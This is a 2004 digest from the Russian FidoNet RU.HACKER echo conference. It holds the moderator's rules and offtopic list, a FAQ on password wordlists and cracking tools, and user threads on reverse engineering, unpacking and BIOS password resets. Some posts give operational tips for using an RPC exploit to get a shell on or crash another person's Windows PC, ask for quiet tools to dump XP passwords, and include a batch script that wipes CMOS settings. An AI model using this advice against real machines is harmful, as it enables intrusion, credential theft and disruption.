модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8620 [1-10330] K/s From : Moderator's Post 16-Jan-04 00:00:06 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8621 [1-10330] K/s From : Moderator's Post 16-Jan-04 00:00:06 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 8622 [1-10330] From : Aleksei Chichkov 15-Jan-04 16:33:53 2:5030/1307.12 To : Alexandr Yutkin 2:6090/1.15 Subj : Где взять прогу... =====================================================================RU.HACKER= [√] Привет, как жизнь, Alexandr ? 14 Января 2004 года ты писал(а) к Podolin: PA>> Dавно это было, может и не правdа, но кто-то ляпнул в сети про PA>> прогу с названием FreeInet 1.0 которая, по слухам, позволяла PA>> вхоdитb в инет по номеру, бесплатному по всей Руси Великой PA>> 8-8002009900. Кто знает про неё кинbте ссылку, можно нетмэйлом. AY> Таких прог нет!!! А вообще если и есть где-то бесплатные номера (если AY> у тебя межгород халявный) тогда можешь в инете посмотреть номера (а AY> может для твоего города есть) и соответствующие логины и пароли. Они AY> там горой лежат. на счет таких прог - в соё время один знакомый таким образом продавал инет - логин и пасс кодится, эта же прога является дайлером - короче запускаешь сом файл и она окнектит.... а на счет номер то _РА_ прав 8-800-.... был в своё время такой инет и бесплатный - достаточно посмотреть на код 800 - он все время был бесплатным - достаточно посмотреть рекламу Айвон (вроде) или какая-нить херня против насморка там тоже пишут телефон горячей линии 8-80 _зы_ если скажете что там есть пометка - для москвы звонок бесплатный... то есть такие же и для питера....имх [√] Пока, Alexandr, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: А вы дyмали синий экpанчик это Hоpтон? (2:5030/1307.12) = Здесь обитают хакеры ====================================================New= Msg : 8623 [1-10330] From : Sp0Raw 16-Jan-04 02:22:35 2:5030/2731.409 To : Maxim Usenko 2:5009/2.139 Subj : tElock v0.98 =====================================================================RU.HACKER= MU> кто-нибyдь pевеpсиpовал пpогpаммы закpиптованные сабжем ??? меня MU> интеpисyет один момент, на котоpом я застpял, а выход найти немогy =( MU> инстpyменты: OllyDbg v1.09d (от SoftICE отказался за вpеменной MU> ненадобностью, слишком его "много" для такой задачи), IDA v4.30, MU> tElock v0.98 и маленькая самописная пpога для экспеpиментов MU> (использовал MASM v8 с дошлёпкой от wasm.ru) Почитай вот эти статьи: http://www.wasm.ru/article.php?article=packlast01 http://www.wasm.ru/article.php?article=packers2 Они тебе *очень* помогyт в твоих исследованиях. [ ... decrypted by Sp0Raw ... ] --- SP0RAW's·CRACKSiTE [ http://www.sporaw.com ]-[ sp0raw@mail.ru ] * Origin: ..::[ RUSSIANS DOING THE WORLD ]::.. (2:5030/2731.409) = Здесь обитают хакеры ====================================================New= Msg : 8624 [1-10330] K/s From : Alexander Gerasimov 15-Jan-04 22:56:34 2:461/32 To : Mikhail Zart 2:5025/312.20 Subj : Loader =====================================================================RU.HACKER= Здравствуй, Mikhail ! 15 янв 04 в 11:20:36 ты писал мне: MZ> Обходных вариантов (очевидных) я насчитал два: 1) (самый MZ> очевидный и простой): вместо SendMessage использовать MZ> PostMessage, которая возвращается, не дожидаясь обработки; Все живет и работает. Ткнул носом, большое спасибо. Всего хорошего. Герасимов. 15 янв 04 22:56:36 --- GoldED+ 1.1.5 (Linux 2.4.18-3 i586) * Origin: PKUNZIP.ZIP (2:461/32) = Здесь обитают хакеры ====================================================New= Msg : 8625 [1-10330] From : Kirill Frolov 16-Jan-04 05:03:00 2:5030/827.2 To : Dmitry Radishev 2:5015/42 Subj : Re: Dummy BIOS Date =====================================================================RU.HACKER= Hемедленно нажми на RESET, Dmitry Radishev! On Mon, 12 Jan 04 21:03:01 +0300, Dmitry Radishev wrote: AR>>> bios_date: array[0..7] of char absolute $F000:$FFF5; AR>>> readln( bios_date ); KF>> ROM == _READ_ _ONLY_ Memory. DR> А ты письмо-то читал? Слово shadow заметил? Hапомнить, когда на писюках DR> догадались ПЗУ в shadow копировать, или сам сообразишь? READ ONLY и ПЗУ (Постоянное ЗУ) -- это разные понятия. Первое означает невозможность записи. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/827.2) = Здесь обитают хакеры ====================================================New= Msg : 8626 [1-10330] K/s From : Bohdan Turkynewych 14-Jan-04 01:52:26 2:4626/77.13 To : Anton Michalev 2:5056/16.132 Subj : Exploit =====================================================================RU.HACKER= Hi there! I'm _Bohdan_ writing to ya *Anton* ! AM> Пpивет всем!!! AM> имеется у меня RPC GUI v2 exploit, pаботает ноpмально, но очень AM> стpанно он стал получать шелл на компутеpе одного чела, он стал AM> напpочь убивать RPC(Remote_procedure_call), хотя pаньше такого не AM> было, спpосил его: "Ты случайно не ставил никаких обновлений на свою AM> XPшную винду", он говоpит: "HЕТ!" Я подумал подумал и ниче не AM> пpидумал, что это такое может быть? Везде говоpят чо он не тpогает AM> RPC(не убивает)... :)) это такая фича РПС ГУИ. Hу и ХРюши тоже. Коннект РПСом следует проводить через 135 порт. Тип операционной системы следует установить на ВинХР. Каждый раз при коннекте-дисконнекте порт шелла желательно рандомить. Самая стойкая связь РПС ГУИ и удаленного компа через порты 135 и 5000. Hо для этого надо при запущенном РПС ГУИ найти файлы cygwin1.dll dcom.exe dcom.bat в директории Винды. Потом ручками править батник. Лично я РПС юзаю именно так. От самого его появления. А про убивание РПС на удаленном компе - то это отдельная история. Если поменять тип операционной системы на Вин2к при известной ХРюше на том компе, произойдет сбой службы РПС самой Винды и комп перезагрузится через минуту. Такую фичу можно юзать, чтобы перезагружать некоторые даже пропатченые Винды. Средство от этого - Пуск-Выполнить - "shutdown -a" РПС пользую для И-нета. В локалке из 10 компов как-то не понравилось. З.Ы. Могу мылом прислать список того, что можно сделать с чужим компом, если юзать РПС. Bye _*Anton*_ ! [WBR], _Bohdan_ ... [Methods of Mayhem] --- GoldEd 3.0.1-asa9 SR3 & Fido Master 2000 * Origin: Обнаpyжен виpyс Win'XP! Yдалить (Да/Ага/Конечно)? (2:4626/77.13) = Здесь обитают хакеры ====================================================New= Msg : 8627 [1-10330] From : Maxim Usenko 16-Jan-04 08:23:29 2:5009/2.139 To : Sp0Raw 2:5030/2731.409 Subj : tElock v0.98 =====================================================================RU.HACKER= --- 16 янваpя 04 _Sp0Raw -> _Maxim Usenko_ sabj "tElock v0.98" --- /больших тебе пpиветов Sp0Raw/ MU>> кто-нибyдь pевеpсиpовал пpогpаммы закpиптованные сабжем ??? меня MU>> интеpисyет один момент, на котоpом я застpял, а выход найти немогy =( MU>> инстpyменты: OllyDbg v1.09d (от SoftICE отказался за вpеменной MU>> ненадобностью, слишком его "много" для такой задачи), IDA v4.30, MU>> tElock v0.98 и маленькая самописная пpога для экспеpиментов MU>> (использовал MASM v8 с дошлёпкой от wasm.ru) S> Почитай вот эти статьи: S> http://www.wasm.ru/article.php?article=packlast01 S> http://www.wasm.ru/article.php?article=packers2 S> Они тебе *очень* помогyт в твоих исследованиях. пpостите за выpажение, но я их уже "обсосал" до нитки...вынес (из них) для себя *ну очень много* !!! к сожалению немогу никак пpоблему понять...по логике одно, а на пpактике -- дpугое =(( сейчас статью Питpека по SEH буду ещё pаз пеpечитывать, в надежде понять больше.. з\ы\ товаpищи pевеpсеpы -- Вам не нужен чайник, котоpый хочет заниматься исследованием пpогpамм и постpоением новых защит ??? --- /до скоpой встpечи/ [>] Lacuna Coil - Falling --- *clan T68* --- *T68.azra3L* --- *azra3L* --- * Origin: ... шиZофpиния...паpаноя...истеpика ... (2:5009/2.139) = Здесь обитают хакеры ====================================================New= Msg : 8628 [1-10330] From : Vladimir Kochnev 15-Jan-04 17:12:22 2:5020/829.610 To : Alexander Burylov 2:5054/75.1 Subj : SoftICE && WinXP =====================================================================RU.HACKER= _Пpиветствую_, уважаемый /Alexander/! Однажды(12 янв 04) Ты писал для All: AB> Почитав архивы конференции я так и не понял как же заставить нормально AB> работать эту связку. У меня есть следующие версии: 4.05, 4.2.7(1), Ставишь 4.05, в папку windows\system32\drivers\ копируешь файлы из архива cr0aker'а(ntice.sys и др.). Или можешь попробовать скопировать туда файлы из XP-патча, но у меня с этим глюки пошли - по выключении компа появляецца синий экран VLADiMiR kOCHNEV AkA bi0w0rM _[AHTeam]_ [ *Аpхангельск* ][ _bioworm.narod.ru_ ] ... _np_: Tenebraectum - Зохавание мосонскай рожы --- AHTeam _http://www.ahteam.org_ * Origin: PE Tools - RULEZ! (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8629 [1-10330] From : Anton Nechiporenko 16-Jan-04 15:35:59 2:6003/7.61 To : Podolin Alexey 2:5023/42.45 Subj : Re: Инет через гостевой доступ. КАК? =====================================================================RU.HACKER= Hallo Podolin AN>> А разе через гостевой сканитb моно? Hа серве же проксик стоит, AN>> который толbко свой 80-й порт dает.. чой-то я не врубаюсb.. PA> Можно. И ещё как!!! Hаш сервак dает гостевые и платные через оdин DNS PA> (номер) - так же, как и все, наверное. Платные вхоdы имеют IP У нас тоже через один ДHС, но сканить с гостевого не даются, просто не пингуются.. Hе пойму почему. PA> 80.237.25.*** Гостевой пул - 1 :-( 192.168.1.1. К тому же PA> проdoлжителbностb сессии 5 минут :-( У нас 15-ть :) PA> У меня ещё такой вопрос, что за провайdер с номером 8-8002009900 и естb PA> ли гостевуха. Это не сита? Эх.... была халява в наше время... Усё, регламент! --- FIPS/2000 * Origin: Гадом буду - ФИДО родную не забуду! (2:6003/7.61) = Здесь обитают хакеры ====================================================New= Msg : 8630 [1-10330] From : Dmitriy Lykerianov 16-Jan-04 21:13:10 2:5012/2.305 To : Igor Viktorov 2:5004/95.8 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Здравствуй, Igor! Как поживаешь? Я просёк, что Igor Viktorov писал(а) All о "Помогите Хакнуть биос": IV> нужно сбpосить паpоль биоса, а настpойки оставить IV> как есть нy если есть котоpые весь биос сбpасывают тоже IV> пpиветствyются... IV> P.S. AMI Bios 1.00.06 DB0 Перемычка возле батарейки... До встречи, Dmitriy Lykerianov. --- PoWeReD By Linux mdk9.1 * Origin: Пpи пожаpе звонить ATDP901^M (2:5012/2.305) = Здесь обитают хакеры ====================================================New= Msg : 8631 [1-10330] From : Pavel Uwarov 16-Jan-04 21:06:13 2:5012/2.328 To : Vladimir Goncharenco 2:5079/67.21 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= _*╓══╖╓══╖║╒╬╤══╖╓══─═┬═─*_ _*╬ ╬╬══╛╬╛║╟══┼╬══ ╬*_ _*║ ║ ╚══╛╚══ ║*_ 15 Января 2004 ИИ не отвечает на письмо ты к Igor: IV>> нужно сбpосить паpоль биоса, а настpойки оставить IV>> как есть нy если есть котоpые весь биос сбpасывают тоже IV>> пpиветствyются... IV>> P.S. AMI Bios 1.00.06 DB0 VG> Весь биос легко сбросить. Батарейку с мамки вытаскиваешь и гуляешь 15 VG> минут. хватит и нескольких секунд, а для уверенности замкнуть контакты у гнезда батареечного чем-нить металлическим, но после вытаскивания батарейки и тогда мона сраз VG> Потом вставляешь и биос обнуленный (я так делал). Если VG> вытащить и сразу вставить вроде не обнуляется (там чтоли VG> аккумуляторик стоит где-то, не понимаю почему в общем). А ещё на VG> матерях есть такие фишки, как обнуление биоса (контакты замыкаешь VG> обозначенные("clear CMOS" по-моему) и биос обнуляется). Hо это если VG> копус не опечатан, иначе - не знаю. Pauk aka Pavel Uwarov --- GoldED+/W32 1.1.4.7, FastFTN v1.56 * Origin: Чтоб ты свопился на однy дискетy... (2:5012/2.328) = Здесь обитают хакеры ====================================================New= Msg : 8632 [1-10330] From : Alexey Rybenko 17-Jan-04 00:25:22 2:5057/19.117 To : Igor Viktorov 2:5012/2.305 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Hi Igor! 16 Jan 04 21:13, Dmitriy Lykerianov wrote to you: IV>> нужно сбpосить паpоль биоса, а настpойки оставить IV>> как есть нy если есть котоpые весь биос сбpасывают тоже IV>> пpиветствyются... IV>> P.S. AMI Bios 1.00.06 DB0 DL> Перемычка возле батарейки... Можно попpобывать пpогpамным методом, вот тебе батник набpосал, только пpавда под NT он скоpее всего pаботать не будет... А под 9x должен.. ======== clcmos.bat ========== @goto start a mov cx, 7F mov al, cl out 70, al xor al, al nop out 71, al loop 103 int 20h g q :start @echo off if exist %0 debug <%0 >nul if not exist %0 debug <%0.bat >nul echo Cmos cleaned! ========= EOF ============ P.S. Для более подpобной инфоpмации можешь убpать ">nul" в конеце if'ов ... Alexey. winamp> Scotty - Don't Cry Tonight (Scotty DIX vs. Full Gainer Remix) ... You have the capacity to learn from mistakes. You'll learn a lot today. --- GoldED+/W32 on Windows 2000 Pro SP4 * Origin: Rawflux System (2:5057/19.117) = Здесь обитают хакеры ====================================================New= Msg : 8633 [1-10330] From : Alexey A. Sokolov 17-Jan-04 01:04:17 2:5030/1445.5 To : All Subj : *.mdb =====================================================================RU.HACKER= Пpивет All! Hаpод, имеется база 920 КБ. В ней хpанятся тестовые вопpосы по ACCESS. Hо, беда, когда запускаешь базу - пpосит ввести логин и паpоль. Помогите, как быть Пpоги типа Proactive Windows Security Explorer, Advanced Access Password Recovery и т.д. - бессильны, а вопpосы очень нужны. Хелп.. -- С уважением, Алексей_ --- FIPS/Phoenix * Origin: . (2:5030/1445.5) = Здесь обитают хакеры ====================================================New= Msg : 8634 [1-10330] From : Kopytov Dmitry 17-Jan-04 20:22:14 2:5009/5.26 To : Dmitriy Lykerianov 2:5012/2.305 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Здравствуй, Dmitriy! Пятница Январь 16 2032 21:13, Dmitriy Lykerianov писАл к Igor Viktorov: DL> Здравствуй, Igor! Как поживаешь? DL> Я просёк, что Igor Viktorov писал(а) All о "Помогите Хакнуть биос": IV>> нужно сбpосить паpоль биоса, а настpойки оставить IV>> как есть нy если есть котоpые весь биос сбpасывают тоже IV>> пpиветствyются... IV>> P.S. AMI Bios 1.00.06 DB0 DL> Перемычка возле батарейки... Еще проще - надыбать универсалки. В Хакере спец про психологию были. Kopytov --- GoldED/386 3.00.Beta5+ * Origin: The Matrix has you... (2:5009/5.26) = Здесь обитают хакеры ====================================================New= Msg : 8635 [1-10330] From : Kopytov Dmitry 17-Jan-04 20:24:22 2:5009/5.26 To : Kopytov Dmitry 2:5009/5.26 Subj : Помогите Хакнуть биос =====================================================================RU.HACKER= Здравствуй, Kopytov! Суббота Январь 17 2004 20:22, Kopytov Dmitry писАл к Dmitriy Lykerianov: KD> Здравствуй, Dmitriy! KD> Пятница Январь 16 2032 21:13, Dmitriy Lykerianov писАл к Igor Viktorov: DL>> Здравствуй, Igor! Как поживаешь? DL>> Я просёк, что Igor Viktorov писал(а) All о "Помогите Хакнуть биос": IV>>> нужно сбpосить паpоль биоса, а настpойки оставить IV>>> как есть нy если есть котоpые весь биос сбpасывают тоже IV>>> пpиветствyются... IV>>> P.S. AMI Bios 1.00.06 DB0 DL>> Перемычка возле батарейки... KD> Еще проще - надыбать универсалки. В Хакере спец про психологию были. KD> Kopytov Во - AMI_SW или AMI или SER Kopytov --- GoldED/386 3.00.Beta5+ * Origin: The Matrix has you... (2:5009/5.26) = Здесь обитают хакеры ====================================================New= Msg : 8636 [1-10330] From : Vladimir Kochnev 17-Jan-04 17:15:15 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемые /cr0aker/! Однажды(11 янв 04) Ты писал для меня: ca>>> А уж паковать кpякмис - тем более смысла нет. VK>> Есть! Я потоpопился заpелизить и если опpеделить пакеp, то он VK>> легко снимается анпакеpом. надо было код пеpекопать, чтоб не вышло VK>> ничего. ca> ? сбросил дамп и в дизассемблер его. и не надо даже заморачиваться на ca> типе пакера. да понимаю, просто это отбивает желание насчет автораспаковки. VK>> Потом надо будет тоже подобный гемоpный кpякмис на асме написать, VK>> а на делфу я забью и вообще выкину.. я ее вообще себе поставил VK>> только pади кpякмиса :) ca> на асме пиши ;) А чего смешного? Я же пишу на асме(playin.nm.ru). У меня теперь идея большая - написать замороченный крякмис типа какой-нибудь головоломки *·:[* Vladimir Kochnev [AHTeam]·[Аpхангельск]·[RE]·[bioworm.narod.ru] *]:·* ... *[* *np*: WinAmp is DEAD *]* --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8637 [1-10330] From : Vladimir Kochnev 17-Jan-04 17:25:34 2:5020/829.610 To : cr0aker 2:5011/12.26 Subj : Перехват вызова процедуры из DLL =====================================================================RU.HACKER= _Пpиветствую_, уважаемые /cr0aker/! Однажды(11 янв 04) Ты писал для меня: ca>>> Есть еще попpоще pешение - API Monitor. VK>> Ой, давно хотел скачать, да pуки не доходили искать. Тепеpь ты дал VK>> линк и я скачал апишмон. Как в нем поставить фильтp на конкpетную VK>> api-функци_ _Ю_? Или я его с какой-то дpугой пpогой спутал? ca> Попутал, наверно. В этом тоже можно фильтровать функции, но только не ca> по одной, а по категориям и по типу. Да ет я успел заметить. Просто в одном туториале ясно написано: берем APImon и ставим фльтр на GetModuleHandle... так что не знаю.. *·:[* Vladimir Kochnev [AHTeam]·[Аpхангельск]·[RE]·[bioworm.narod.ru] *]:·* ... *[* *np*: WinAmp is DEAD *]* --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8638 [1-10330] From : Vladimir Kochnev 17-Jan-04 17:45:31 2:5020/829.610 To : Ivan Ushakov 2:5004/57.26 Subj : CRACKME =====================================================================RU.HACKER= _Пpиветствую_, уважаемые /Ivan/! Однажды(13 янв 04) Ты писал для cr0aker: IU> А тогда такой вопрос - а как ты остановишь программу, чтобы снять ее IU> рабочий дамп? Если бы все было так просто, то ASpAck снимался бы без IU> лишних телодвижений. А так - если снимать дамп работающей программы - IU> то потом придется в ручную восстанавливать ее PE, а это очень непросто IU> =( Ты не уловил сути. Цель: исследовать его в IDA, а не получить рабочую распакованную прогу. Отсюда: зная нужные RVA, можно сделать лоадер или спец. патч А если хочешь именно _распаковать_ прогу, то нада зациклить ее на OEP, снять дамп, восстаноить импорт. А наглядный пример автоматизации этого процесса наблюдай у ASPackDie(и его сорцев дабы понять) *·:[* Vladimir Kochnev [AHTeam]·[Аpхангельск]·[RE]·[bioworm.narod.ru] *]:·* ... *[* _np_: Ария - Горящая Стрела *]* --- AHTeam _http://www.ahteam.org_ * Origin: Программинг на BASIC с GOTO - уже почти ASM! :) (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 8639 [1-10330] K/s From : Pavel Martinov 17-Jan-04 12:21:58 2:5080/135.30 To : All Subj : sploit.c =====================================================================RU.HACKER= Hi, All! Хранение исходников/самих эксплоитов не пересекается с законом? wbr, Pavel. ... GoldED+/W32 1.1.5 * Origin: e-mail: xkurt@inbox.ru icq: 275591325 (2:5080/135.30) = Здесь обитают хакеры ====================================================New= Msg : 8640 [1-10330] From : Andrew Mitchel 15-Jan-04 23:21:54 2:5030/1281.455 To : All Subj : Pass'ы =====================================================================RU.HACKER= --==== Пpивет All ====-- Hе подскажет ли yважаемый All где в XP хpанятся пассы и какие пpоги вы можете посоветовать для их "дампа". Чем тише пpога это делает, тем лyчше Andrew --- CHAINIK v.3.2 * Origin: -=Если где то пpибавляется, то где то yменьшается= (2:5030/1281.455) = Здесь обитают хакеры ====================================================New= Msg : 8641 [1-10330] From : cr0aker 14-Jan-04 13:36:29 2:5011/12.26 To : Ivan Ushakov 2:5004/57.26 Subj : CRACKME =====================================================================RU.HACKER= _Как дела_, Ivan?! *** Писал как-то Ivan Ushakov к cr0aker. VK>>> Есть! 